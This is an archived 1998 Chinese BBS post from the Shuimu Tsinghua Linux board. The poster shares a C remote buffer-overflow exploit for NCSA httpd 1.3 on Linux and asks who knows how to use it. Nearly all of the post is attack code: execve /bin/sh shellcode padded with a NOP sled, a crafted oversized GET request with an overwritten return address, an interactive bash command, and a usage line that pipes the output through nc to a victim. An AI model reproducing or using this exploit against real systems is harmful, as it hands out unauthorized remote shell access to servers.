BBS水木清华站∶精华区

发信人: tjb (老六), 信区: Linux 
标  题: 谁会用这个 
发信站: BBS 水木清华站 (Fri Jul 10 20:57:02 1998) 
 
 
可以获得remote exploit 
/* 
 * NCSA 1.3 Linux/intel remote xploit by savage@apostols.org 1997-April-23 
 * 
 * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore,EDevil and the rest of T 
oXyn !!! 
 * 
 * usage: 
 *      $ (hackttpd 0; cat) | nc victim 143 
 *                  | 
 *                  +--> usually from -1000 to 1000 (try steeps of 100) 
 */ 
 
#include <stdio.h> 
 
unsigned char shell[] = { 
'/',0x90,0x90,0x90, 
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90, 
0xeb,0x27,0x5e,0x31,0xed,0x31,0xc9,0x31,0xc0,0x88,0x6e,6,0x89,0xf3,0x89,0x76, 
0x24,0x89,0x6e,0x28,0x8d,0x6e,0x24,0x89,0xe9,0x8d,0x6e,0x28,0x89,0xea,0xb0,0x0b, 
0xcd,0x80,0x31,0xdb,0x89,0xd8,0x40,0xcd,0x80,0xe8,0xd4,0xff,0xff,0xff, 
'b','i','n','/','s','h' 
}; 
 
char username[256+8]; 
 
void main(int argc, char *argv[]) { 
        int i,a; 
        long val; 
 
        if(argc>1) 
                a=atoi(argv[1]); 
        else 
                a=0; 
 
        strcpy(username,shell); 
 
        for(i=strlen(shell);i<sizeof(username);i++) 
                username[i]=0x90; /* NOP */ 
 
        val = 0xbfff537c + 4 + a; 
 
        i=sizeof(username)-4; 
        { 
                username[i+0] = val & 0x000000ff; 
                username[i+1] = (val & 0x0000ff00) >> 8; 
                username[i+2] = (val & 0x00ff0000) >> 16; 
                username[i+3] = (val & 0xff000000) >> 24; 
        }                                                                       
        username[ sizeof(username) ] = 0; 
 
        printf("GET %s\n/bin/bash -i 2>&1;\n", username); 
} 
说是对付1.3.0的httpd 
-- 
                         
      一壶浊酒喜相逢       
   古今多少事均赋笑谈中    
                           
                           
 
※ 修改:·tjb 於 Jul 10 20:59:54 修改本文·[FROM:  202.200.37.100] 
※ 来源:·BBS 水木清华站 bbs.net.tsinghua.edu.cn·[FROM: 202.200.37.100] 

BBS水木清华站∶精华区